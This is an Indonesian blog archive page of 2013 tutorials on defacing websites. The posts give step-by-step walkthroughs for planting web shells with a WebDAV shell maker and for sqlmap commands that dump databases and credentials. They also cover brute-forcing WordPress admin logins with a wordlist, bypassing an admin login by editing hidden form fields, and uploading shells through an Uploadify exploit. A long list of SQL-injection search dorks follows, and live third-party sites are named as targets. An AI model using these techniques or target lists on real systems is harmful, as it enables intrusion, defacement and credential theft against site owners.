Tampilkan postingan dengan label DEFACE. Tampilkan semua postingan
Tampilkan postingan dengan label DEFACE. Tampilkan semua postingan
0

Cara Mudah Deface Website Dengan Webdav Shell | Lengkap

Sabtu, 08 Juni 2013
Selamat pagi sobat semua,sebelumnya saya minta maaf karena jarang berkunjung di blog sobat semua.Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah ( Mbah Qopet's Quote ) :p

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya. Dibawah sudah saya siapkan link downloadnya.

Download Link :

Tutorial Deface Web dengan Webdav Shell Maker :
1). Download kemudian extract file ls-rootkit.Rar
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

3). Buka menu Setting, pada menu setting Name of your shell bisa diubah dengan nama kamu, kemudian Load Shell from file, pilih shell Umer.asp;

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

4). Selanjutnya, pilih Add site, disini saya menggunakan target http://fpzbtc.com/ lalu klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

5). Klik Serang !!!, lalu tunggu hingga scanning web selesai, jika shell berhasil tertanam, tampilannya akan seperti ini, klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

6). Block http://fpzbtc.com/Cirebon.asp;.txt lalu Copy dan Pastekan pada Addressbar Browser kalian, kemudian tekan Enter.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

7). Jika sudah masuk website target, klik UPLOAD FILE TO Blablabla,

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

8). Pilih scipt .html deface'an kamu, kemudian klik Upload!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

9). Tahap akhir, copy file .html yang sudah kamu upload tadi lalu pastekan dibelakang Url website target.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

10). Enter dan lihat hasilnya!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

Jika ingin mendeface seluruh halaman, kamu tinggal RENAME file kamu dengan Index.html, atau istilahnya tukar-menukar file .html ( Cari file bernama Index.html atau sejenisnya, delete file tersebut lalu Rename file upload'an kamu menjadi Index.html ) Gimana, ngerti ngga? harus ngerti!

Kalo menurut saya jangan nyerang Index nya deh, kasian adminnya... mending nitip file .html aja, kalo emang kamu hati nurani :p

Tidak semua website rentan atau mempunyai celah/vuln, jadi kalo belum berhasil... cari website lain yang bisa ditanami shell dengan tools ini.


Thanks To Cyberart
0

Kumpulan trik DEFACER

0

SQLi dengan python 2013

Minggu, 26 Mei 2013
Ok mulai dari step yang pertama..

1. Sediakan Python dapat di cari di google dengan versi 2.7.3
2. Sqlmap. Download Disini
3. Command Promt (saya gunakan Win XP)

Ok mulai tahap pertama

1. Download python serta Sqlmap nya
2. Extract rar Sqlmap lalu rename folder sqlmap dengan root ,
3. lalu pindahkan ke Drive C
4. Buka Cmd lalu ketikan seperti ini .

cd c:\root [ENTER]
sqlmap.py  
Seperti ini .
Mudahkan Mantab deh...

5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : 

sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database)
"Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :

6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah :

sqlmap.py -u SiteVuln -D database nya --tables ENTER , 
Nah Munculkan banyak kan tuh , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :


7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :

sqlmap.py -u SiteVuln -T Tabel nya --columns
,, Oke kalo udah Enter lagi , dan lihat hasil nya :




Ea kk , jangan berbahagia dulu  soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Biar gak penasaran , lanjut ke step berikut nya

8.Melihat isi dari kolom tersebut Seperti biasa masukan sintaks lagi, sintakz nya adalah :

sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan . Setelah kita mendapatkan username nya, lakukan hal yang sama auntuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :

dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5,masalah tersebut bisa di atasi pake havij Takut "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" .
pesen seya si sebelum di scen pakek python seken dloo pakek hevij panel adminya yaaa.

By Post : Adam Cyber
0

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce

Sabtu, 18 Mei 2013
Salam Sobat,, ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: Lihat

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute



Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D
0

Cara Tebas Index Website CMS Wordpress

Jumlah Lagi Sama Adam Honest.
Hadewh,, demi sobat2 ane buatin nih Tutorial sederhana, biar pada ngerti,, wkwk :p
Langsung sajalah... Repot banget dah gitu males ngetik.. wkwkwk :p
Mohon Tutorial ini dibaca, diliat, dipahami dan dicermati baik2 yaahh,, ga ngerti ane jitaakk!! :3
ini untuk CMS Wordpress yah trus ane jg pake madspotshell,, jadi klo sobat pake shell yg lain pasti beda atuh :3

Notice! 
Kalo bisa index jangan dirusak! budayakan menghargai hasil kerja keras orang lain!

Dowload Madspotshell

Udah ah, langsung Buka Shellnya yah.. ;)


Saatnya nyari index nya,, dimana??? Dimana Dimana Dimana?? Hajiaahh! Malah nyanyi? -_- hehehe, santai ya sob, ;) Lihat Gambar! untuk mencari index nya sobat cuma perlu mencarinya di Path/folder utama website tsb. biasanya di Public_Html, klo ga ada, pokoknya dalemnya berisi file2 utama seperti: Wp-Login,Wp-Admin,Wp-Config, wp-content, dsb



Liat baik2 gambar diatas! di path utama berisikan semua files website! noh liat ada index.php, udah ketemu kan? kalo mau nyari config, klik aja wp-config.php :p
Ane harap, indexnya jangan dirusak, sebaiknya dibackup,, cukup upload aja file index.html  halaman deface sobat! atau  bisa juga index.php kita ubah. klik "R" di bagian kanan kemudian sobat rename aja jadi index.php_backup lalu klik [>>] untuk save!


Keterangan:

R : Rename
E : Edit
D : Download
X : Delete
[>>] : Eksekusi

selanjutnya buatlah file index.php yg baru lalu pastekan script deface sobat, dan save! liat gambar!



kalo sudah, langsung cek aja hasilnya,, :p hmm,, udah ah begitu aje kagak pelu repot2 :p
0

Cara Tebas Index Website CMS Wordpress 2013


Assalamualaikum....

Tidak ada bosan2 nya ane mau share tentang depes2an,, soalnya lagi marak dan bnyak banget yg menyukai aktivitas ini, yah walaupun beresiko masuk BUI,, wkwkwk :p

Langsung aja lah, males ngetik banyak2! :p


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)

Bahan Bahan :

Dork: inurl:/index_info.php     Lihat Dork yg lain Disini

Live Target : http://niche-marketplace.net/index_info.php  

Note: "Mohon Live Target Jangan Dirusak, karena untuk pembelajaran bersama, kalo udah bisa cari aja target yang lain!"

Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php



Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php 


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!



 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!


Lalu tekan Enter!


Klik Login aja!

Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p



Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p


Trus Tebas index nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!

Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!

WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p

Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"



Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

<Line kosong>
<Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
<Line kosong>
<Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Harap Live Target ini jangan di Tebas om! Buat aja file baru!Atau Cari Target Lain!
0

Cara Mudah Deface Dengan Remote Code Execution | Backtrack


Assalamualaikum...


Okey sobat , masih bersama ane admin terbaik sejagad,, hajiahh :D yup, kali ini saatnya berbagi lagi... daripada ga ada kerjaan, mending bagi bagi ilmu aja :D
Pada tutorial ini , cuma sedikit berbeda caranya saja, disini ane gunain OS Backtrack, ane udah coba pake Windows, tapi ribet!! >.< Silahkan sobatcoba2 aja gunain Windows OS, tapi kalo ada masalah nantinya  silahkan di solving sendiri yah.. wokwokwok :D

Bahan - Bahan :

1. Script Upload.php | Download Password: Lihat

2. Google Dork: inurl:"/wp-content/themes/Brainstorm/"
 #Silahkan Dork dikembangkan lagi 

3. Live Target : Lihat1 & Lihat2

4. Install PHP5-Curl | Lihat disini

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah - Langkah :

1. Pertama cari dulu target dengan menggunakan Dork..



2. Disini ane udah nemuin targetnya.. dan langsung aja cari upload.php nya



Penting! Kalo halaman menjadi kosong, ada kemungkinan exploit bisa dijalankan!

3. Sebelumnya letakkan file Uploadify.php dan Shell sobat di folder /var/www/


4. Lalu edit dulu Uploadify.php dengan Notepad, silahkan dirubah yg ane kasi tanda panah seperti Link target, nama file dan folder! Lalu Save kembali..


5. Selanjutnya Buka terminal dan jalankan Apache dengan ketikkan perintah: /etc/init.d/apache2 start lalu enter!



6. Kemudian ketik perintah berikut diterminal : cd /var/www/ lalu enter!! lalu ketik lagi perintah: php uploadify.php lalu enter! dan silahkan sobat tunggu hasilnya!

7. nah tuh, shell telah berhasil diupload ke web,, selanjutnya tinggal eksekusi shell dan Tebas index web.. wokwokwok :D

Note: Ga semua hasilnya sama begitu,, kalo ga nampil seperti gambar, silahkan sobat cari dimana letak shell sobat :D

Good Luck!!!!! :D
0

Kumpulan cara deface website 2013

Kamis, 16 Mei 2013
Kumpulan Tutorial Deface Website All In OneNotice: : "Jangan Ngerusak Situs2 Indonesia!"
Disclaimer: "Segala bentuk Tutorial yang kami bagikan disini hanya ditujukan sebagai Pengetahuan dan Pembelajaran, Penyalahgunaan atas Tutorial yang ada di blog ini diluar tanggung jawab kami. Use at your
own risk."
Cara Tebas Index Website Joomla
Cara Deface Web Dengan Bypass Admin Login
Cara Deface Dengan WPBruteforce
Apa Itu Webshell?
Cara Deface Dengan CSRF
Cara Deface Dengan Teknik Exploit Joomla
Cara Mencari Config dalam Website
Cara Tebas Index Website
Cara Crack CPanel
SQL Injection Vulnerability Scanner
Cara Deface dengan Havij
Cara Menemukan Halaman Login Admin
Teknik Manual SQL Injection
Blind SQL Injection
Cara Deface dengan LFI/RFI
Cara Deface dengan Upload Shell Vulnerability
Cara Tamper Data
Cara Deface Dengan Non-Persistent XSS
2

Kumpulan Dork SQL Injection Terbaru 2013

kali ini saya akan share kumpulan dork SQLi terbaru. Ya, dork memang selalu mengalami perkembangan sesuai dengan berkembangnya kreatifitas si pembuat. Apalagi SQL Injection yang memiliki macam-macam tanda error.
Oke, langsung saja, inilah dork SQLi Terbaru [Mei] 2013 :
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID= 
inurl:play_old.php?id= 
inurl:declaration_more.php?decl_id= 
inurl:pageid= 
inurl:games.php?id= 
inurl:page.php?file= 
inurl:newsDetail.php?id= 
inurl:gallery.php?id= 
inurl:article.php?id= 
inurl:show.php?id= 
inurl:staff_id= 
inurl:newsitem.php?num= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:historialeer.php?num= 
inurl:reagir.php?num= 
inurl:Stray-Questions-View.php?num= 
inurl:forum_bds.php?num= 
inurl:game.php?id= 
inurl:view_product.php?id= 
inurl:newsone.php?id= 
inurl:sw_comment.php?id= 
inurl:news.php?id= 
inurl:avd_start.php?avd= 
inurl:event.php?id=  
inurl:product-item.php?id= 
inurl:sql.php?id= 
inurl:news_view.php?id= 
inurl:select_biblio.php?id= 
inurl:humor.php?id= 
inurl:aboutbook.php?id= 
inurl:ogl_inet.php?ogl_id= 
inurl:fiche_spectacle.php?id= 
inurl:communique_detail.php?id= 
inurl:sem.php3?id= 
inurl:kategorie.php4?id= 
inurl:news.php?id= 
inurl:index.php?id=
inurl:faq2.php?id= 
inurl:show_an.php?id= 
inurl:preview.php?id= 
inurl:loadpsb.php?id= 
inurl:opinions.php?id= 
inurl:spr.php?id= 
inurl:pages.php?id= 
inurl:announce.php?id= 
inurl:clanek.php4?id= 
inurl:participant.php?id= 
inurl:download.php?id= 
inurl:main.php?id= 
inurl:review.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:prod_detail.php?id= 
inurl:viewphoto.php?id= 
inurl:article.php?id= 
inurl:person.php?id= 
inurl:productinfo.php?id= 
inurl:showimg.php?id= 
inurl:view.php?id= 
inurl:website.php?id= 
inurl:hosting_info.php?id= 
inurl:gallery.php?id= 
inurl:rub.php?idr= 
inurl:view_faq.php?id= 
inurl:artikelinfo.php?id= 
inurl:detail.php?ID= 
inurl:index.php?= 
inurl:profile_view.php?id= 
inurl:category.php?id= 
inurl:publications.php?id= 
inurl:fellows.php?id= 
inurl:downloads_info.php?id= 
inurl:prod_info.php?id= 
inurl:shop.php?do=part&id= 
inurl:productinfo.php?id= 
inurl:collectionitem.php?id= 
inurl:band_info.php?id=  
inurl:product.php?id= 
inurl:releases.php?id= 
inurl:ray.php?id= 
inurl:produit.php?id= 
inurl:pop.php?id= 
inurl:shopping.php?id= 
inurl:productdetail.php?id= 
inurl:post.php?id= 
inurl:viewshowdetail.php?id= 
inurl:clubpage.php?id= 
inurl:memberInfo.php?id= 
inurl:section.php?id= 
inurl:theme.php?id= 
inurl:page.php?id= 
inurl:shredder-categories.php?id= 
inurl:tradeCategory.php?id= 
inurl:product_ranges_view.php?ID= 
inurl:shop_category.php?id= 
inurl:transcript.php?id= 
inurl:channel_id= 
inurl:item_id= 
inurl:newsid= 
inurl:trainers.php?id= 
inurl:news-full.php?id= 
inurl:news_display.php?getid= 
inurl:index2.php?option= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:newsone.php?id= 
inurl:event.php?id= 
inurl:product-item.php?id= 
inurl:sql.php?id= 
inurl:aboutbook.php?id= 
inurl:preview.php?id= 
inurl:loadpsb.php?id= 
inurl:pages.php?id= 
inurl:material.php?id= 
inurl:clanek.php4?id= 
inurl:announce.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:viewapp.php?id= 
inurl:viewphoto.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:review.php?id= 
inurl:iniziativa.php?in= 
inurl:curriculum.php?id= 
inurl:labels.php?id= 
inurl:story.php?id= 
inurl:look.php?ID= 
inurl:newsone.php?id= 
inurl:aboutbook.php?id=  
inurl:material.php?id= 
inurl:opinions.php?id= 
inurl:announce.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:tekst.php?idt= 
inurl:newscat.php?id= 
inurl:newsticker_info.php?idn= 
inurl:rubrika.php?idr= 
inurl:rubp.php?idr= 
inurl:offer.php?idf=
inurl:art.php?idm= 
inurl:title.php?id= 
buy.php?category= 
article.php?ID= 
play_old.php?id= 
declaration_more.php?decl_id= 
Pageid= 
games.php?id= 
page.php?file= 
newsDetail.php?id= 
gallery.php?id= 
article.php?id= 
play_old.php?id= 
show.php?id= 
staff_id= 
newsitem.php?num= 
readnews.php?id= 
top10.php?cat= 
historialeer.php?num= 
reagir.php?num= 
forum_bds.php?num= 
game.php?id= 
view_product.php?id= 
newsone.php?id= 
sw_comment.php?id= 
news.php?id= 
avd_start.php?avd= 
event.php?id= 
product-item.php?id= 
sql.php?id= 
news_view.php?id= 
select_biblio.php?id= 
humor.php?id= 
aboutbook.php?id= 
fiche_spectacle.php?id= 
communique_detail.php?id= 
sem.php3?id= 
kategorie.php4?id= 
faq2.php?id= 
show_an.php?id= 
preview.php?id= 
loadpsb.php?id=  
opinions.php?id= 
spr.php?id= 
pages.php?id= 
announce.php?id= 
clanek.php4?id= 
participant.php?id= 
download.php?id= 
main.php?id= 
review.php?id= 
chappies.php?id= 
read.php?id= 
prod_detail.php?id= 
viewphoto.php?id= 
article.php?id= 
play_old.php?id= 
declaration_more.php?decl_id= 
category.php?id= 
publications.php?id= 
fellows.php?id= 
downloads_info.php?id= 
prod_info.php?id= 
shop.php?do=part&id= 
Productinfo.php?id= 
website.php?id= 
Productinfo.php?id=
showimg.php?id= 
view.php?id= 
rub.php?idr= 
view_faq.php?id= 
artikelinfo.php?id= 
detail.php?ID= 
collectionitem.php?id= 
band_info.php?id= 
product.php?id= 
releases.php?id= 
ray.php?id= 
produit.php?id= 
pop.php?id= 
shopping.php?id= 
productdetail.php?id= 
post.php?id= 
viewshowdetail.php?id= 
clubpage.php?id= 
memberInfo.php?id= 
section.php?id= 
theme.php?id= 
page.php?id= 
shredder-categories.php?id= 
tradeCategory.php?id= 
shop_category.php?id= 
transcript.php?id= 
channel_id= 
item_id=  
newsid= 
trainers.php?id= 
buy.php?category= 
article.php?ID= 
play_old.php?id= 
iniziativa.php?in= 
detail_new.php?id= 
tekst.php?idt= 
newscat.php?id= 
newsticker_info.php?idn= 
rubrika.php?idr= 
rubp.php?idr= 
offer.php?idf=
hotel.php?id= 
art.php?idm= 
title.php?id= 
look.php?ID= 
story.php?id= 
labels.php?id= 
review.php?id= 
chappies.php?id= 
news-full.php?id= 
news_display.php?getid= 
index2.php?option= 
ages.php?id= 
"id=" & intext:"Warning: mysql_fetch_assoc() 
"id=" & intext:"Warning: mysql_fetch_array() 
"id=" & intext:"Warning: mysql_num_rows() 
"id=" & intext:"Warning: session_start() 
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown() 
"id=" & intext:"Warning: pg_exec() 
"id=" & intext:"Warning: array_merge() 
"id=" & intext:"Warning: mysql_result() 
"id=" & intext:"Warning: mysql_num_rows() 
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize() 



Sekian postingan kali ini dan Happy Hacking !!